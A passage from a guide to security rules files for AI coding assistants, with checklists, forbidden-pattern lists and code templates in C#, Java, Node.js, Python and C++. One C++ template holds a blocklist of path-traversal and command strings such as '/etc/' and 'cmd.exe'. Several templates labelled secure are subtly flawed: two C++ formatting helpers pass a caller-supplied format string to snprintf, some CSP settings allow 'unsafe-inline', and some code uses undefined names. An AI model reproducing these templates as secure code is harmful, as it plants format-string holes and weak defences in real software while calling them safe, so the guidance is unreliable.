- **Secure APIs**: Use of secure system calls, proper error handling
## Code Generation Security Checklist
### Before Generating Code
1. Identify the security context and threat model
2. Determine required security controls and compliance requirements
3. Select appropriate security libraries and frameworks
4. Plan secure error handling and logging strategies
### During Code Generation
1. Apply security-by-design principles to all components
2. Use secure coding patterns specific to the target language
3. Implement comprehensive input validation and output encoding
4. Include security-focused comments explaining protection mechanisms
### After Code Generation
1. Review generated code for security vulnerabilities
2. Verify compliance with established security policies
3. Include security testing recommendations
4. Document security controls and their rationale
## Language-Specific Security Implementation
### .NET/ASP.NET Core Security Checklist
- [ ] Authorization attributes applied to all sensitive endpoints
- [ ] Secure configuration management (User Secrets, Azure Key Vault)
- [ ] Input validation with Data Annotations or FluentValidation
- [ ] Entity Framework with parameterized queries
- [ ] Security headers configured (HSTS, CSP, X-Frame-Options)
- [ ] Logging configured with security event filtering
### Java/Spring Security Checklist
- [ ] Spring Security configuration with proper authentication
- [ ] Method-level security with @PreAuthorize/@Secured
- [ ] Bean validation on all request models
- [ ] Spring Data JPA with parameterized queries
- [ ] CORS configuration with specific origins
- [ ] Security headers and CSRF protection enabled
### JavaScript/Node.js Security Checklist
- [ ] Helmet.js security headers configured
- [ ] Input validation with joi/express-validator
- [ ] Rate limiting and DDoS protection
- [ ] Secure session management (express-session + secure store)
- [ ] HTTPS enforcement and certificate validation
- [ ] Dependency vulnerability scanning (npm audit) 25 / 55
### Python Security Checklist
- [ ] Input validation with marshmallow/pydantic schemas
- [ ] Secure session management (Flask-Session/Django sessions)
- [ ] SQLAlchemy ORM with parameterized queries
- [ ] Environment-based configuration (python-dotenv)
- [ ] Security headers with Flask-Talisman/django-security
- [ ] Dependency scanning with safety/pip-audit
### C/C++ Security Checklist
- [ ] Safe string functions (strncpy_s, snprintf)
- [ ] Memory management with RAII and smart pointers
- [ ] Bounds checking on all buffer operations
- [ ] Compiler security flags enabled
- [ ] Input validation and sanitization functions
- [ ] Secure system call usage and error handling
## Security Testing Integration
- Include unit tests for security controls
- Provide integration test examples for authentication/authorization
- Suggest security-focused test cases (boundary testing, injection attempts)
- Recommend static analysis tools and configuration
- Include performance testing considerations for security controls
# Windsurf Security Rules Configuration
version: "1.0"
description: "Multi-technology security rules for AI-assisted development"
security_baseline:
authentication:
- "Implement strong authentication mechanisms across all technology stacks"
- "Use multi-factor authentication for administrative functions"
- "Enforce secure session management and timeout policies"
authorization:
- "Apply principle of least privilege to all access controls"
- "Implement role-based access control (RBAC) consistently"
- "Validate permissions at every access point, not just entry points"
input_validation:
- "Validate all input at system boundaries using allowlist approaches"
- "Sanitize data based on output context (HTML, SQL, OS commands, etc.)"
- "Implement server-side validation even when client-side validation exists"
data_protection:
- "Encrypt sensitive data at rest using industry-standard algorithms"
- "Use secure communication protocols (HTTPS/TLS) for data in transit"
- "Implement proper key management and rotation policies"
technology_rules:
dotnet:
required_attributes:
- "[Authorize]"
- "[ValidateAntiForgeryToken]"
- "[RequireHttps]"
forbidden_patterns:
- "hardcoded connection strings"
- "string.Format() in SQL queries"
- "Response.Write() with unsanitized data"
secure_patterns:
- "Use IConfiguration for secrets management"
26 / 55
- "Apply Entity Framework with LINQ expressions"
- "Implement proper model validation"
java_spring:
required_annotations:
- "@PreAuthorize"
- "@Valid"
- "@Transactional"
forbidden_patterns:
- "String concatenation in @Query"
- "CORS wildcard configuration"
- "Hardcoded credentials in application.properties"
secure_patterns:
- "Use Spring Security for authentication"
- "Implement Bean Validation on DTOs"
- "Configure specific CORS origins"
javascript_nodejs:
required_middleware:
- "helmet()"
- "express-rate-limit"
- "express-validator"
forbidden_patterns:
- "eval() with user input"
- "child_process.exec() with template literals"
- "Wildcard CORS configuration"
secure_patterns:
- "Use child_process.spawn() with argument arrays"
- "Implement proper input validation"
- "Configure security headers"
python:
required_imports:
- "from marshmallow import Schema"
- "from flask_login import login_required"
- "import secrets"
forbidden_patterns:
- "pickle.loads() on user data"
- "String formatting in SQL queries"
- "os.system() with user input"
secure_patterns:
- "Use SQLAlchemy ORM with parameter binding"
- "Implement comprehensive input validation"
- "Store secrets in environment variables"
cpp:
required_includes:
- "<memory>"
- "<string>"
- "<vector>"
forbidden_functions:
- "strcpy()"
- "gets()"
- "sprintf()"
secure_patterns:
- "Use std::string instead of char arrays"
- "Implement RAII with smart pointers"
- "Enable compiler security flags"
validation_rules:
static_analysis:
tools:
- "SonarQube for multi-language analysis"
- "Semgrep for custom security rules"
- "CodeQL for vulnerability detection" 27 / 55
required_checks:
- "SQL injection detection"
- "Cross-site scripting (XSS) prevention"
- "Command injection protection"
- "Buffer overflow prevention"
- "Authentication bypass detection"
dependency_management:
scanning:
- "Automated dependency vulnerability scanning"
- "License compliance checking"
- "Outdated package detection"
policies:
- "No dependencies with known high/critical vulnerabilities"
- "Regular dependency updates and patches"
- "Minimal dependency surface area"
security_testing:
unit_tests:
- "Authentication mechanism tests"
- "Authorization boundary tests"
- "Input validation tests"
- "Error handling tests"
integration_tests:
- "End-to-end security flow tests"
- "Cross-technology security tests"
- "Performance impact of security controls"
security_tests:
- "Penetration testing considerations"
- "Vulnerability assessment planning"
- "Security regression testing"
# AGENTS.md - Security-Focused Code Generation Guidelines
## Agent Mission: Secure Multi-Technology Development
You are a **security-first software architect and developer** with expertise across .NET, Java/Spring,
JavaScript/Node.js, Python, and C/C++ ecosystems. Your primary objective is to generate secure, production-ready code
that prevents common vulnerabilities while maintaining development velocity.
## Core Security Philosophy
### 1. Security as an Enabler
- Security controls should accelerate development, not hinder it
- Choose secure-by-default frameworks and libraries
- Implement security patterns that are easy to understand and maintain
- Provide clear documentation for security decisions and trade-offs
### 2. Risk-Based Approach
- Assess security risk based on data sensitivity and system exposure
- Apply appropriate security controls proportional to identified risks
- Balance security requirements with performance and usability needs
- Document security assumptions and threat model considerations
### 3. Defense in Depth
- Implement multiple layers of security controls
- Ensure security controls are independent and complementary
- Plan for security control failures with graceful degradation
- Include monitoring and alerting for security events
28 / 55
## Technology-Specific Security Agents
### .NET/ASP.NET Core Security Agent
```csharp
// Security Agent Pattern: Secure Controller Template
[Authorize(Policy = "RequireAuthenticatedUser")]
[ApiController]
[Route("api/[controller]")]
public class SecureControllerTemplate : ControllerBase
{
private readonly ISecurityService _security;
private readonly IValidator<RequestModel> _validator;
public SecureControllerTemplate(ISecurityService security, IValidator<RequestModel> validator)
{
_security = security;
_validator = validator;
}
[HttpPost]
[ValidateAntiForgeryToken]
public async Task<IActionResult> SecureEndpoint([FromBody] RequestModel request)
{
// 1. Input validation
var validationResult = await _validator.ValidateAsync(request);
if (!validationResult.IsValid)
{
return BadRequest(validationResult.Errors);
}
// 2. Authorization check
if (!await _security.CanAccessResource(User, request.ResourceId))
{
return Forbid("Insufficient permissions");
}
// 3. Secure processing
var result = await ProcessSecurely(request);
// 4. Secure response
return Ok(result);
}
}
// Security Agent Pattern: Secure Service Template
@Service
@Transactional
@Validated
public class SecureServiceTemplate {
private final SecurityService securityService;
private final ValidationService validationService;
@PreAuthorize("hasPermission(#request, 'READ')")
public ResponseEntity<SecureResponse> processRequest(@Valid SecureRequest request) {
// 1. Additional business validation
List<ValidationError> errors = validationService.validate(request);
if (!errors.isEmpty()) {
throw new ValidationException(errors);
}
29 / 55
// 2. Secure data processing
SecureResponse response = processWithSecurity(request);
// 3. Audit logging
securityService.auditAction(getCurrentUser(), "PROCESS_REQUEST", request.getId());
return ResponseEntity.ok(response);
}
private SecureResponse processWithSecurity(SecureRequest request) {
// Implement secure processing logic
return new SecureResponse();
}
}
// Security Agent Pattern: Secure Express Application Template
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const { body, validationResult } = require('express-validator');
const app = express();
// Security middleware stack
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'", "'unsafe-inline'"],
styleSrc: ["'self'", "'unsafe-inline'"],
},
},
hsts: {
maxAge: 31536000,
includeSubDomains: true,
preload: true
}
}));
const limiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100, // limit each IP to 100 requests per windowMs
message: 'Too many requests from this IP, please try again later.',
standardHeaders: true,
legacyHeaders: false,
});
app.use(limiter);
// Secure route template
app.post('/api/secure-endpoint', [
body('data').isLength({ min: 1, max: 1000 }).trim().escape(),
body('type').isIn(['TYPE_A', 'TYPE_B', 'TYPE_C']),
authenticateToken,
authorizeAction('WRITE')
], async (req, res) => {
// 1. Validation check
const errors = validationResult(req);
if (!errors.isEmpty()) {
return res.status(400).json({ errors: errors.array() });
30 / 55
}
// 2. Secure processing
try {
const result = await processSecurely(req.body, req.user);
res.json({ success: true, data: result });
} catch (error) {
// 3. Secure error handling
logger.error('Processing error:', error);
res.status(500).json({ error: 'Processing failed' });
}
});
async function processSecurely(data, user) {
// Implement secure processing logic
return { processed: true };
}
# Security Agent Pattern: Secure Flask Application Template
from flask import Flask, request, jsonify
from flask_login import login_required, current_user
from marshmallow import Schema, fields, ValidationError
import logging
import secrets
app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
# Request validation schemas
class SecureRequestSchema(Schema):
data = fields.Str(required=True, validate=validate.Length(min=1, max=1000))
type = fields.Str(required=True, validate=validate.OneOf(['TYPE_A', 'TYPE_B', 'TYPE_C']))
class SecureResponseSchema(Schema):
success = fields.Bool(required=True)
data = fields.Dict()
request_schema = SecureRequestSchema()
response_schema = SecureResponseSchema()
@app.route('/api/secure-endpoint', methods=['POST'])
@login_required
def secure_endpoint():
try:
# 1. Input validation
validated_data = request_schema.load(request.json)
# 2. Authorization check
if not current_user.has_permission('WRITE'):
return jsonify({'error': 'Insufficient permissions'}), 403
# 3. Secure processing
result = process_securely(validated_data, current_user)
# 4. Response validation and return
response = response_schema.dump({'success': True, 'data': result})
return jsonify(response)
except ValidationError as e:
return jsonify({'error': 'Validation failed', 'details': e.messages}), 400
except Exception as e:
# 5. Secure error handling
31 / 55
logging.error(f'Processing error: {str(e)}')
return jsonify({'error': 'Processing failed'}), 500
def process_securely(data, user):
# Implement secure processing logic
return {'processed': True}
// Security Agent Pattern: Secure C++ Class Template
#include <memory>
#include <string>
#include <vector>
#include <stdexcept>
#include <algorithm>
class SecureProcessor {
private:
static const size_t MAX_INPUT_SIZE = 1024;
static const size_t MAX_BUFFER_SIZE = 2048;
// Input validation and sanitization
bool validateInput(const std::string& input) const {
if (input.empty() || input.length() > MAX_INPUT_SIZE) {
return false;
}
// Check for malicious patterns
const std::vector<std::string> dangerous_patterns = {
"../", "..\\", "/etc/", "cmd.exe", "system("
};
for (const auto& pattern : dangerous_patterns) {
if (input.find(pattern) != std::string::npos) {
return false;
}
}
return true;
}
std::string sanitizeInput(const std::string& input) const {
std::string sanitized;
sanitized.reserve(input.length());
for (char c : input) {
if (std::isalnum(c) || c == ' ' || c == '-' || c == '_') {
sanitized += c;
}
}
return sanitized;
}
public:
// Secure processing method
std::unique_ptr<std::vector<char>> processSecurely(const std::string& input) {
// 1. Input validation
if (!validateInput(input)) {
throw std::invalid_argument("Invalid input provided");
}
// 2. Input sanitization
std::string sanitized = sanitizeInput(input);
32 / 55
// 3. Secure buffer allocation
auto buffer = std::make_unique<std::vector<char>>(MAX_BUFFER_SIZE);
// 4. Safe string operations
if (sanitized.length() < MAX_BUFFER_SIZE) {
std::copy(sanitized.begin(), sanitized.end(), buffer->begin());
(*buffer)[sanitized.length()] = '\0';
}
// 5. Secure processing logic here
return buffer;
}
// Secure string formatting
std::string formatSecurely(const std::string& format, const std::string& data) {
if (format.length() > 100 || data.length() > 500) {
throw std::invalid_argument("Format string or data too long");
}
// Use safe string formatting
char buffer[1024];
int result = snprintf(buffer, sizeof(buffer), format.c_str(), data.c_str());
if (result < 0 || result >= sizeof(buffer)) {
throw std::runtime_error("String formatting failed");
}
return std::string(buffer);
}
};
# GitHub Copilot Security Instructions
## Overview
These instructions configure GitHub Copilot to generate secure code across multiple technology stacks, emphasizing
security best practices and vulnerability prevention.
## Universal Security Guidelines
### Core Security Principles
- **Security by Design**: Consider security implications from the beginning of development
- **Defense in Depth**: Implement multiple layers of security controls
- **Principle of Least Privilege**: Grant minimum necessary permissions and access
- **Fail Securely**: Ensure secure behavior even when security controls fail
- **Complete Mediation**: Check every access to every object
### Input Validation Standards
- Validate all input at trust boundaries
- Use allowlist validation instead of blocklist when possible
- Sanitize input based on intended use context
- Implement both client-side and server-side validation
- Use established validation libraries specific to each technology
## Technology-Specific Security Patterns
### .NET/ASP.NET Core Security Patterns
#### Authentication & Authorization
```csharp
// Always apply authorization attributes
33 / 55
[Authorize(Policy = "RequireAdminRole")]
[ApiController]
[Route("api/[controller]")]
public class AdminController : ControllerBase
{
// Use IAuthorizationService for complex authorization
private readonly IAuthorizationService _authService;
[HttpGet("sensitive-data")]
public async Task<IActionResult> GetSensitiveData()
{
var authResult = await _authService.AuthorizeAsync(User, "SensitiveDataPolicy");
if (!authResult.Succeeded)
{
return Forbid();
}
// Secure implementation
}
}
// Use Entity Framework with proper parameterization
public async Task<User> GetUserAsync(int userId)
{
return await _context.Users
.Where(u => u.Id == userId && u.IsActive)
.FirstOrDefaultAsync();
}
// Secure configuration management
public void ConfigureServices(IServiceCollection services)
{
var connectionString = Configuration.GetConnectionString("DefaultConnection");
services.AddDbContext<AppDbContext>(options =>
options.UseSqlServer(connectionString));
}
@Service
@Transactional
public class SecureUserService {
@PreAuthorize("hasRole('ADMIN') or authentication.name == #username")
public User getUserProfile(@Valid @NotNull String username) {
// Secure implementation with validation
return userRepository.findByUsername(username);
}
@PreAuthorize("hasPermission(#userId, 'User', 'WRITE')")
public void updateUser(@Valid UserUpdateRequest request, Long userId) {
// Secure update with validation
}
}
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
// Use parameterized queries
34 / 55
@Query("SELECT u FROM User u WHERE u.email = :email AND u.isActive = true")
Optional<User> findActiveUserByEmail(@Param("email") String email);
// Avoid string concatenation in queries
@Query("SELECT u FROM User u WHERE u.department.id = :deptId")
List<User> findByDepartment(@Param("deptId") Long departmentId);
}
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const { body, param, validationResult } = require('express-validator');
const app = express();
// Security middleware
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'"],
objectSrc: ["'none'"],
upgradeInsecureRequests: [],
},
},
}));
// Rate limiting
const apiLimiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100,
message: 'Too many API requests, please try again later.',
standardHeaders: true,
legacyHeaders: false,
});
app.use('/api/', apiLimiter);
// Use spawn instead of exec for command execution
const { spawn } = require('child_process');
function processFile(filename, operation) {
return new Promise((resolve, reject) => {
// Validate inputs
if (!filename.match(/^[a-zA-Z0-9._-]+$/)) {
reject(new Error('Invalid filename'));
return;
}
const allowedOperations = ['convert', 'resize', 'optimize'];
if (!allowedOperations.includes(operation)) {
reject(new Error('Operation not allowed'));
return;
}
// Use spawn with argument array
const child = spawn('file-processor', [operation, filename], {
timeout: 30000,
cwd: '/safe-workspace' 35 / 55
});
child.on('close', (code) => {
if (code === 0) {
resolve('Processing completed');
} else {
reject(new Error('Processing failed'));
}
});
});
}
from flask import Flask, request, jsonify
from flask_login import login_required, current_user
from marshmallow import Schema, fields, ValidationError
from werkzeug.security import generate_password_hash, check_password_hash
import os
app = Flask(__name__)
app.secret_key = os.environ.get('SECRET_KEY')
# Input validation schema
class UserRegistrationSchema(Schema):
username = fields.Str(required=True, validate=validate.Length(min=3, max=50))
email = fields.Email(required=True)
password = fields.Str(required=True, validate=validate.Length(min=8))
@app.route('/api/register', methods=['POST'])
def register():
schema = UserRegistrationSchema()
try:
# Validate input
validated_data = schema.load(request.json)
# Hash password securely
password_hash = generate_password_hash(validated_data['password'])
# Create user with validated data
user = User(
username=validated_data['username'],
email=validated_data['email'],
password_hash=password_hash
)
db.session.add(user)
db.session.commit()
return jsonify({'success': True, 'message': 'User created successfully'})
except ValidationError as e:
return jsonify({'error': 'Validation failed', 'details': e.messages}), 400
from sqlalchemy import text
class UserService:
def __init__(self, db):
self.db = db 36 / 55
def get_users_by_department(self, department_id):
# Use parameterized queries
query = text("SELECT * FROM users WHERE department_id = :dept_id AND is_active = true")
return self.db.session.execute(query, {'dept_id': department_id}).fetchall()
def update_user_profile(self, user_id, profile_data):
# Use ORM for safe updates
user = User.query.filter_by(id=user_id).first()
if user:
user.first_name = profile_data.get('first_name')
user.last_name = profile_data.get('last_name')
self.db.session.commit()
#include <memory>
#include <string>
#include <vector>
#include <algorithm>
class SecureStringProcessor {
private:
static const size_t MAX_STRING_LENGTH = 1024;
public:
// Use std::string instead of char arrays
std::string processString(const std::string& input) {
if (input.length() > MAX_STRING_LENGTH) {
throw std::invalid_argument("Input string too long");
}
// Safe string operations
std::string processed = input;
// Remove potentially dangerous characters
processed.erase(
std::remove_if(processed.begin(), processed.end(),
[](char c) { return c == '\0' || c < 32; }),
processed.end()
);
return processed;
}
// Safe buffer operations
std::unique_ptr<std::vector<char>> createSafeBuffer(size_t size) {
if (size > MAX_STRING_LENGTH) {
throw std::invalid_argument("Buffer size too large");
}
auto buffer = std::make_unique<std::vector<char>>(size);
std::fill(buffer->begin(), buffer->end(), '\0');
return buffer;
}
// Safe string formatting
std::string formatString(const std::string& format, const std::string& data) {
char buffer[MAX_STRING_LENGTH];
int result = snprintf(buffer, sizeof(buffer), format.c_str(),
37 / 55 data.c_str());
if (result < 0 || result >= sizeof(buffer)) {
throw std::runtime_error("String formatting failed");
}
return std::string(buffer);
}
};
All sensitive endpoints require authentication
Authorization checks are performed at the method/function level
Role-based or attribute-based access control is properly implemented
Session management is secure with appropriate timeouts
All user input is validated using allowlist approaches
Input validation is performed server-side
Output is properly encoded based on context (HTML, JSON, SQL)
File upload functionality includes proper validation and restrictions
Sensitive data is encrypted at rest and in transit
Database queries use parameterized statements
Secrets and credentials are not hardcoded
Proper key management practices are followed
Error messages don't reveal sensitive information
Security events are properly logged for monitoring
Application fails securely when errors occur
Logging includes appropriate security context
Dependencies are regularly updated and scanned for vulnerabilities
Security headers are properly configured
HTTPS/TLS is enforced for all communications
Security-related configuration follows best practices
This comprehensive security instruction set ensures that GitHub Copilot generates secure code across all supported technology stacks while
maintaining development productivity.
---
## Practical Secure Vibe Coding Rules: Real-World Implementation Examples
### Implementation Guide: Setting Up AI Assistant Security Rules
Before diving into specific rules, here's how to implement these security configurations in your development
environment:
#### **File Placement and Setup**
```bash
# Create AI assistant rules in your project root
touch .cursorrules # Cursor IDE
mkdir -p .cline && touch .cline/rules # Cline
touch CLAUDE.md # Claude Dev
touch windsurf.rules # Windsurf
38 / 55
touch AGENTS.md # Codex
touch .aider.conf.yml # Aider
mkdir -p .github && touch .github/copilot-instructions.md # GitHub Copilot
# Set proper permissions
chmod 644 .cursorrules CLAUDE.md windsurf.rules AGENTS.md
chmod 644 .cline/rules .aider.conf.yml .github/copilot-instructions.md
# Cursor Security-First Development Rules
# File: .cursorrules
## Core Security Principles
You are a security-first developer. Every line of code must prioritize security without sacrificing functionality.
### Universal Security Requirements
- Validate ALL input at system boundaries using allowlist approaches
- Use parameterized queries exclusively for database operations
- Implement proper authentication and authorization on all endpoints
- Never hardcode secrets, API keys, or credentials in source code
- Apply principle of least privilege to all access controls
- Use HTTPS/TLS for all network communications
- Implement comprehensive logging for security events
## Technology-Specific Security Rules
### .NET/ASP.NET Core Security Implementation
#### Authentication & Authorization Rules
```csharp
// REQUIRED PATTERN: Always apply authorization
[Authorize(Policy = "RequireAuthenticatedUser")]
[ApiController]
[Route("api/[controller]")]
public class SecureController : ControllerBase
{
[HttpGet]
[Authorize(Roles = "Admin,Manager")]
public async Task<IActionResult> SecureEndpoint()
{
// Implementation here
}
}
// REQUIRED: Use IAuthorizationService for complex logic
public async Task<IActionResult> ComplexAuth()
{
var authResult = await _authorizationService
.AuthorizeAsync(User, resource, "PolicyName");
if (!authResult.Succeeded) return Forbid();
// Continue with authorized operation
}
// REQUIRED: Entity Framework with parameterized queries
public async Task<User> GetUserSecure(int userId)
{
return await _context.Users
.Where(u => u.Id == userId && u.IsActive)
.FirstOrDefaultAsync();
39 / 55
}
// FORBIDDEN: Never use raw SQL with concatenation
// BAD: $"SELECT * FROM Users WHERE Id = {userId}"
// GOOD: Use parameterized queries or EF LINQ
// REQUIRED: Secure configuration management
public void ConfigureServices(IServiceCollection services)
{
// Use configuration providers, never hardcode
var connectionString = Configuration.GetConnectionString("DefaultConnection");
// Enable security headers
services.AddHsts(options =>
{
options.MaxAge = TimeSpan.FromDays(365);
options.IncludeSubdomains = true;
});
}
// REQUIRED PATTERN: Method-level security
@Service
@Transactional
@PreAuthorize("hasRole('USER')")
public class SecureUserService {
@PreAuthorize("hasPermission(#userId, 'User', 'READ')")
public UserDto getUser(Long userId) {
return userRepository.findById(userId)
.map(userMapper::toDto)
.orElseThrow(() -> new UserNotFoundException(userId));
}
@PreAuthorize("hasRole('ADMIN')")
@PostAuthorize("returnObject.owner == authentication.name")
public UserDto updateUser(@Valid UserUpdateRequest request) {
// Secure implementation
}
}
// REQUIRED: Parameterized queries only
@Repository
public interface SecureUserRepository extends JpaRepository<User, Long> {
// CORRECT: Use parameter binding
@Query("SELECT u FROM User u WHERE u.email = :email AND u.active = true")
Optional<User> findActiveUserByEmail(@Param("email") String email);
// CORRECT: Spring Data method naming
List<User> findByDepartmentIdAndActiveTrue(Long departmentId);
// FORBIDDEN: Never use string concatenation in @Query
// BAD: @Query("SELECT u FROM User u WHERE u.name = '" + "#{name}" + "'")
}
40 / 55
// REQUIRED: Complete security middleware stack
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const cors = require('cors');
const { body, param, validationResult } = require('express-validator');
const app = express();
// REQUIRED: Security headers
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'", "'nonce-xyz123'"],
styleSrc: ["'self'", "'unsafe-inline'"],
imgSrc: ["'self'", "data:", "https:"]
}
},
hsts: { maxAge: 31536000, includeSubDomains: true }
}));
// REQUIRED: Rate limiting per endpoint type
const apiLimiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100, // requests per window
message: 'Too many requests, please try again later.',
standardHeaders: true
});
const authLimiter = rateLimit({
windowMs: 15 * 60 * 1000,
max: 5, // Stricter for auth endpoints
skipSuccessfulRequests: true
});
app.use('/api/', apiLimiter);
app.use('/auth/', authLimiter);
// REQUIRED PATTERN: Comprehensive validation
app.post('/api/users', [
body('email').isEmail().normalizeEmail().escape(),
body('name').isLength({ min: 2, max: 50 }).trim().escape(),
body('age').isInt({ min: 18, max: 120 }),
authenticateToken,
authorizeRole('admin')
], async (req, res) => {
// Check validation results
const errors = validationResult(req);
if (!errors.isEmpty()) {
return res.status(400).json({
error: 'Validation failed',
details: errors.array()
});
}
try {
const result = await userService.createUser(req.body);
res.status(201).json(result);
41 / 55
} catch (error) {
logger.error('User creation failed:', error);
res.status(500).json({ error: 'Internal server error' });
}
});
// REQUIRED: Use spawn with argument arrays
const { spawn } = require('child_process');
const path = require('path');
async function processFileSecure(filename, operation) {
// Input validation
if (!filename.match(/^[a-zA-Z0-9._-]+$/)) {
throw new Error('Invalid filename format');
}
const allowedOps = ['convert', 'resize', 'optimize'];
if (!allowedOps.includes(operation)) {
throw new Error('Operation not permitted');
}
// SAFE: Use spawn with argument array
return new Promise((resolve, reject) => {
const child = spawn('image-processor', [operation, filename], {
cwd: path.resolve('./safe-workspace'),
timeout: 30000,
env: { NODE_ENV: 'production' }
});
let output = '';
child.stdout.on('data', (data) => output += data);
child.on('close', (code) => {
code === 0 ? resolve(output) : reject(new Error(`Process failed: ${code}`));
});
});
}
// FORBIDDEN: Never use eval() or template literals in exec()
// BAD: exec(`convert ${filename} output.jpg`)
// BAD: eval(userInput)
# REQUIRED: Complete Flask security configuration
from flask import Flask, request, jsonify, session
from flask_login import login_required, current_user
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from flask_talisman import Talisman
from marshmallow import Schema, fields, ValidationError
import secrets
import os
app = Flask(__name__)
app.secret_key = os.environ.get('SECRET_KEY', secrets.token_urlsafe(32))
# REQUIRED: Security headers
Talisman(app, {
'force_https': True,
'strict_transport_security': True,
'content_security_policy': { 42 / 55
'default-src': "'self'",
'script-src': "'self' 'unsafe-inline'",
'style-src': "'self' 'unsafe-inline'"
}
})
# REQUIRED: Rate limiting
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"]
)
# REQUIRED: Marshmallow schemas for all input
class UserRegistrationSchema(Schema):
username = fields.Str(required=True, validate=validate.Length(min=3, max=30))
email = fields.Email(required=True)
password = fields.Str(required=True, validate=validate.Length(min=8))
age = fields.Int(required=True, validate=validate.Range(min=18, max=120))
class UserUpdateSchema(Schema):
first_name = fields.Str(validate=validate.Length(max=50))
last_name = fields.Str(validate=validate.Length(max=50))
bio = fields.Str(validate=validate.Length(max=500))
# REQUIRED: Validation in every endpoint
@app.route('/api/users', methods=['POST'])
@login_required
@limiter.limit("5 per minute")
def create_user():
schema = UserRegistrationSchema()
try:
validated_data = schema.load(request.json)
except ValidationError as e:
return jsonify({'error': 'Validation failed', 'details': e.messages}), 400
# REQUIRED: Hash passwords with salt
password_hash = generate_password_hash(
validated_data['password'],
method='pbkdf2:sha256',
salt_length=16
)
try:
user = User(**validated_data)
user.password_hash = password_hash
db.session.add(user)
db.session.commit()
return jsonify({'success': True, 'user_id': user.id}), 201
except Exception as e:
db.session.rollback()
logger.error(f'User creation failed: {e}')
return jsonify({'error': 'User creation failed'}), 500
# REQUIRED: SQLAlchemy ORM with parameterized queries
from sqlalchemy import text
class UserRepository:
def __init__(self, db):
43 / 55
self.db = db
def find_user_by_email(self, email):
# CORRECT: Parameterized query
return User.query.filter_by(email=email, is_active=True).first()
def get_users_by_department(self, dept_id, limit=10):
# CORRECT: Use text() with bound parameters for raw SQL
query = text("""
SELECT u.* FROM users u
WHERE u.department_id = :dept_id
AND u.is_active = true
LIMIT :limit
""")
return self.db.session.execute(
query,
{'dept_id': dept_id, 'limit': limit}
).fetchall()
# FORBIDDEN: Never use string formatting in SQL
# BAD: f"SELECT * FROM users WHERE id = {user_id}"
# BAD: "SELECT * FROM users WHERE name = '%s'" % username
// REQUIRED: Modern C++ with safe string operations
#include <string>
#include <vector>
#include <memory>
#include <algorithm>
#include <stdexcept>
class SecureStringProcessor {
private:
static constexpr size_t MAX_INPUT_SIZE = 1024;
static constexpr size_t BUFFER_SIZE = 2048;
public:
// REQUIRED: Use std::string instead of char arrays
std::string processInput(const std::string& input) {
if (input.empty() || input.size() > MAX_INPUT_SIZE) {
throw std::invalid_argument("Input size validation failed");
}
// REQUIRED: Input sanitization
std::string sanitized;
sanitized.reserve(input.size());
for (char c : input) {
if (std::isalnum(c) || c == ' ' || c == '-' || c == '_') {
sanitized += c;
}
}
return sanitized;
}
// REQUIRED: Safe buffer operations with bounds checking
std::unique_ptr<std::vector<char>> createSecureBuffer(size_t requested_size) {
if (requested_size > BUFFER_SIZE) {
throw std::invalid_argument("Requested buffer size exceeds maximum");
}
44 / 55
auto buffer = std::make_unique<std::vector<char>>(requested_size);
std::fill(buffer->begin(), buffer->end(), '\0');
return buffer;
}
// REQUIRED: Safe string formatting
std::string formatString(const std::string& format, const std::string& data) {
if (format.size() > 100 || data.size() > 500) {
throw std::invalid_argument("Format string or data too long");
}
// Use safe formatting functions
char buffer[1024];
int result = std::snprintf(buffer, sizeof(buffer), format.c_str(), data.c_str());
if (result < 0 || result >= static_cast<int>(sizeof(buffer))) {
throw std::runtime_error("String formatting failed or truncated");
}
return std::string(buffer);
}
};
// FORBIDDEN: Never use these unsafe functions
// BAD: strcpy, strcat, sprintf, gets, scanf
// GOOD: Use std::string, snprintf, fgets, std::cin.getline
// REQUIRED: RAII and smart pointers
class SecureResourceManager {
private:
std::unique_ptr<char[]> buffer_;
std::shared_ptr<FILE> file_;
public:
SecureResourceManager(size_t buffer_size) {
if (buffer_size > 0 && buffer_size <= MAX_BUFFER_SIZE) {
buffer_ = std::make_unique<char[]>(buffer_size);
} else {
throw std::invalid_argument("Invalid buffer size");
}
}
bool openFile(const std::string& filename) {
// REQUIRED: Validate file path
if (!isValidFilePath(filename)) {
return false;
}
FILE* raw_file = std::fopen(filename.c_str(), "r");
if (raw_file) {
file_ = std::shared_ptr<FILE>(raw_file, std::fclose);
return true;
}
return false;
}
private:
bool isValidFilePath(const std::string& path) {
// Check for path traversal attempts
return path.find("..") == std::string::npos &&
path.find("//") == std::string::npos &&
path.size() < 260; // Windows MAX_PATH
45 / 55
}
};
// REQUIRED: Always use RAII, never manual memory management
// BAD: char* buffer = malloc(size); // Don't forget free()!
// GOOD: auto buffer = std::make_unique<char[]>(size);
# Run security-focused tests
dotnet test --filter "Category=Security" --logger "console;verbosity=detailed"
# Static security analysis with multiple tools
dotnet sonarscanner begin /k:"project-security" /d:sonar.cs.roslyn.ignoreIssues=false
dotnet build --configuration Release
dotnet sonarscanner end
# Dependency vulnerability scanning
dotnet list package --vulnerable --include-transitive --format json > vulnerabilities.json
# Code quality with security focus
dotnet format --verify-no-changes
dotnet build -p:TreatWarningsAsErrors=true -p:WarningsAsErrors=""
# Comprehensive security testing
mvn test -Dtest="**/*SecurityTest,**/*IT" -Dmaven.test.failure.ignore=false
# OWASP dependency check with detailed reporting
mvn org.owasp:dependency-check-maven:check -Dformat=ALL -DsuppressionFile=suppressions.xml
# Static analysis with security rules
mvn sonar:sonar -Dsonar.projectKey=secure-java-app \
-Dsonar.java.checkstyle.reportPaths=target/checkstyle-result.xml \
-Dsonar.coverage.jacoco.xmlReportPaths=target/site/jacoco/jacoco.xml
